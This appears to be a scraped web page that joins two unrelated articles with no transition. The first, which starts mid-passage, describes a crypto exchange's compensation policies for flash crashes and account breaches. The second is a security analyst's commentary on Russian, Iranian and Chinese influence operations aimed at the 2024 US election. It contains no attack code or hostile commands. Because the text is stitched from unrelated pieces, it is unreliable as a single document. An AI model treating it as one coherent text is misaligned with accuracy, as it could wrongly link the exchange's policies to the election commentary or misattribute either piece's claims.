Cryptocurrency markets are known for their volatility, and sudden, extreme price fluctuations—often referred to as “flash crashes”—can lead to major losses. These crashes are sometimes triggered by factors like market manipulation or temporary liquidity shortages, which can catch users off guard and create an unstable trading environment.

According to UEEx’s policy announcement, the company implemented a compensation framework to mitigate such events’ impact. The platform will now analyze the causes behind extreme market fluctuations and, if it confirms that technical issues or market anomalies caused a flash crash, it will reimburse users for their losses. This move will facilitate greater market stability and bolster user confidence in the platform.

The compensation process works in a way that users can report abnormal market volatility immediately, after which the UEEx team promptly investigates and verifies the relevant data. Once confirmed, the platform assesses the losses and determines the appropriate compensation based on its established rules. The reimbursement is then directly credited to the affected users’ accounts, enabling them to resume trading with minimal disruption.

This policy is part of UEEx’s broader effort to promote fairness and transparency in its operations, ensuring users have a safety net during periods of unpredictable market behaviour.

**Strengthening Asset Security with New Protection Policies**

Despite the advanced security measures in place—such as multi-factor authentication, cold wallet storage, and real-time monitoring—there is always a residual risk of hacking or unauthorized access in the digital asset space. To counter this, UEEx has introduced an asset protection policy that offers compensation to users who experience losses due to breaches that are not caused by their own actions.

Under this policy, if users’ accounts are compromised through no fault of their own, UEEx will compensate them for losses after verifying the incident. The platform’s emphasis on user security reflects its commitment to creating a reliable and trustworthy trading experience.

As for asset security; UEEx secures assets through two-factor authentication (2FA) and cold wallet storage, with its security team ready to act immediately to prevent further losses in case of a breach. Users are encouraged to report any unauthorized transactions or security breaches promptly. After verifying each claim, UEEx offers full or partial compensation based on the specifics to help users recover their losses.

While the platform’s new policies aim to minimize risks, UEEx advises users to take additional steps to safeguard their own accounts. Tips include enabling two-factor authentication for all transactions, regularly updating passwords, and remaining vigilant against phishing scams.

**Editor’s Note:** _The information provided in this article is not intended as trading or cryptocurrency investment advice. Readers are encouraged to conduct their own research and consult with a financial advisor before making any investment decisions. The policies discussed are solely focused on UEEx’s security and compensation measures and should not be construed as endorsements or recommendations for trading or investment strategies._

1.  ETH Exchange Rate Expectations for 2023-2025
2.  Finclusive, Verida, cheqd Launch Reusable KYC/KYB Solution
3.  Criminal IP and Quad9 Collaborate to Exchange IP Threat Intel

Digital Asset Trading Platform UEEx Strengthens Digital Asset Security with New Protection Policy

While these threats remain a valid concern, US government agencies have doubled down on their assurances to the American public that election infrastructure is secure.

Source: Tetra Images via Alamy Stock Photo

COMMENTARY

Adversaries of the United States have been hard at work in advance of the 2024 presidential election. Rather than direct attacks against infrastructure such as voting machines, these nation-state actors — primarily from Russia, China, and Iran — are using cyber operations to stoke discord and influence election outcomes.

The good news is, US leaders have been preparing for these threats for years — and adversaries' efforts have largely been ineffective, despite significant resources invested. Even new artificial intelligence-powered tactics have resulted only in "incremental" productivity and content-generation gains, according to Meta.

Nevertheless, nation-state attacks are a concern. Covert influence campaigns are underway, attempting to: exploit university protests related to the Israel-Hamas conflict in order to erode Americans' trust in US institutions; reduce domestic support for providing military and financial aid to US allies like Ukraine; support and/or undermine political candidates based on whether their policies are perceived as favorable; and more.

**Russia Continues to Dominate Disruption**

Employing a whole-of-government strategy, the Russian government has been the most prolific adversary attempting to disrupt and influence US elections. Operations have increased since 2022, with Russia remaining the top source of disinformation networks disrupted on Facebook and Instagram. Russia recently attempted to impersonate US citizens and media organizations, and Meta has removed more than 5,000 accounts and pages linked to Russian propaganda network Doppelgänger since May 2024. Generative AI (GenAI) is also boosting Russia's capabilities, scaling campaigns via content creation, translation capabilities, and image creation.

Russian operatives have stood up several inauthentic news portals, taking advantage of the increasing trend among Americans to seek news from alternative sources. Fake news websites now outnumber legitimate local news sites, in large part thanks to Russia.

The war in Ukraine has not slowed these efforts, though the Kremlin has outsourced some cyber operations to private contractors.

Russia likely will promote candidates who oppose aid to Ukraine, attack those who support Ukraine, and undermine popular support for Ukraine in swing states.

Due to increased government and researcher scrutiny — such as the Department of Justice's criminal investigation into Americans who have collaborated with Russia's state television networks — Russia-backed campaigns have responded by significantly changing their tactics. Meta reported "notable shifts" in Doppelgänger's operational tactics in response to "aggressive enforcement." But these efforts are unlikely to impact Russia's long-term operations, given its deep pockets and near-unlimited resources. 

**Iran Rises in Prominence**

The government of Iran has emerged as a more significant threat this year than in previous election cycles. The US-Iranian relationship remains tense, and Iran's cyber activities are likely to continue as a tool of statecraft. Like Moscow, Tehran undoubtedly views the election as consequential for its own interests and will attempt to shape the outcome.

Iran's objective is to undermine confidence in democratic institutions and carry out aggressive cyber activities on multiple fronts to gather intelligence. Iranian cyberattacks recently attempted to access sensitive US election information. Other recent attacks targeted the Trump and Biden-Harris presidential campaigns, and breached the email of Roger Stone, a longtime Trump ally and political adviser.

Separate reporting indicates Iranian actors have also spent recent months creating fake news sites and impersonating activists, laying the groundwork to stoke division and potentially sway American voters this fall, especially in swing states.

**China Works to Divide Voters**

The Chinese government continues to amplify polarizing domestic issues ahead of the US elections, increasingly targeting specific candidates and parties. However, China's interference likely will remain limited compared with Russia and Iran, in order to avoid risking its diplomatic relations with the US government.

Nevertheless, Chinese influence campaigns have grown more sophisticated, including Spamouflage Dragon. China has also increased its use of AI-generated content. Chinese operatives use fake social media accounts to poll voters to identify and better understand the most divisive issues in American society. The number of these sock-puppet accounts, likely run by the Chinese Communist Party (CCP), have continued to steadily grow since their emergence in 2023. These operations have achieved very little organic engagement, despite thousands of assets being deployed. Still, there appears to be a clear effort to improve China's understanding of the American political landscape and become more effective at future interference.

**The US Retaliates With Disruption**

Disruption is the name of the game when it comes to defending against these threats. US government agencies continue to name and shame these activities, taking some wind out of adversaries' sails.

In the private sector, some companies are taking a more active approach to identifying influence operations, countering bogus accounts, and taking down infrastructure. Some of these efforts seem effective, with adversaries scrambling to stay operational.

However, tech layoffs have hampered teams responsible for trust and safety, and some social media platforms are retreating from the misinformation fight. The most dramatic pullback has been from social platform X, where misinformation now proliferates under the banner of free speech. The impact on US elections remains to be seen. 

Russia, China, Iran, and other adversaries will continue to target US elections because they know that a united, strong America is not in their own national interest. Thankfully, while these threats remain a valid concern, US government agencies have doubled down on their assurances to the American public that election infrastructure is more secure than ever.

**About the Author**

Cyber Threat Intelligence Analyst, LastPass

Stephanie Schneider is passionate about raising awareness of cybersecurity challenges, blending strategic analysis with a deep understanding of how geopolitical trends influence current threats. In her current role as cyber threat intelligence analyst at LastPass, she tackles emerging threats, provides crucial intelligence insights, and monitors significant events in the cybersecurity landscape. Prior to joining LastPass, Stephanie served as vice president, cyber threat intelligence nation-state lead at Bank of America, where she specialized in defending against nation-state and criminal cyber threats. A graduate of George Washington University’s Elliott School of International Affairs (MA) and St. Edward’s University (BA), Stephanie currently lives in Washington, DC.

Tag

#intel